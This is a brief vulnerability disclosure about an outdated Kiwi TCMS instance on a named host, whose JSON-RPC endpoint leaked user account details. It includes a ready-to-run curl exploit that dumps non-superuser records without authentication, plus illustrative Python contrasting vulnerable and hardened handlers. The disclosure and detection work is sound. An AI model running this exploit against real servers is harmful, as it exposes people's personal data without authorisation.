Outdated `kiwi.youdrive.today` ([Kiwi TCMS](https://kiwitcms.org/) instance) was vulnerable to information disclosure via JSON-RPC endpoints.
Exploit example (dumps the details of every user account except superusers, without authentication):
```bash
curl -i -s -k -X $'POST' -H $'Content-Type: application/json' --data-binary $'{"jsonrpc":"2.0","method":"User.filter","id": 1,"params":{"query":{"is_superuser":false}}}' $'https://kiwi.youdrive.today/json-rpc/'
```
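To make the weakness concrete, here is an added example (not Kiwi TCMS code and not the linked fix) of a minimal JSON-RPC 2.0 dispatcher that feeds the request body above to two `User.filter` handlers: one that answers anyone with the full user table, and an illustrative hardened one that requires a logged-in caller, scopes non-superusers to their own record and strips sensitive fields. The user table, field names and the `-32001` error code are constructed for the example.

```python
import json

# Constructed sample user table standing in for the auth user model.
USERS = [
    {"id": 1, "username": "admin", "email": "admin@example.test", "is_superuser": True},
    {"id": 2, "username": "alice", "email": "alice@example.test", "is_superuser": False},
    {"id": 3, "username": "bob", "email": "bob@example.test", "is_superuser": False},
]


def user_filter_vulnerable(query, caller=None):
    """Weak behaviour: any caller, even anonymous, can filter the whole user table."""
    return [u for u in USERS if all(u.get(k) == v for k, v in query.items())]


def user_filter_hardened(query, caller=None):
    """Illustrative hardening (assumption, not the project's fix): authentication is
    required, non-superusers only see their own record, and only public fields leave."""
    if caller is None:
        raise PermissionError("authentication required")
    rows = user_filter_vulnerable(query)  # same matching logic, different exposure
    if not caller["is_superuser"]:
        rows = [u for u in rows if u["id"] == caller["id"]]
    public = ("id", "username")
    return [{k: u[k] for k in public} for u in rows]


def dispatch(raw_request, handler, caller=None):
    """Parse a JSON-RPC 2.0 body and route 'User.filter' to the given handler."""
    req = json.loads(raw_request)
    if req.get("jsonrpc") != "2.0" or req.get("method") != "User.filter":
        return {"jsonrpc": "2.0", "id": req.get("id"),
                "error": {"code": -32601, "message": "Method not found"}}
    try:
        result = handler(req["params"]["query"], caller)
    except PermissionError as exc:
        return {"jsonrpc": "2.0", "id": req["id"],
                "error": {"code": -32001, "message": str(exc)}}
    return {"jsonrpc": "2.0", "id": req["id"], "result": result}


# The request body from the write-up, reused here as constructed input.
REQUEST = ('{"jsonrpc":"2.0","method":"User.filter","id": 1,'
           '"params":{"query":{"is_superuser":false}}}')

if __name__ == "__main__":
    print(dispatch(REQUEST, user_filter_vulnerable))          # leaks alice and bob with e-mails
    print(dispatch(REQUEST, user_filter_hardened))            # error: authentication required
    print(dispatch(REQUEST, user_filter_hardened, USERS[1]))  # alice sees only her own record
```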
References:
- [Release info](https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/)
- [Commit with fix](https://github.com/kiwitcms/Kiwi/commit/f6b1898f827019e1daf4e98cd4ba1678da0025cf)
- [Self-written nuclei template](https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml)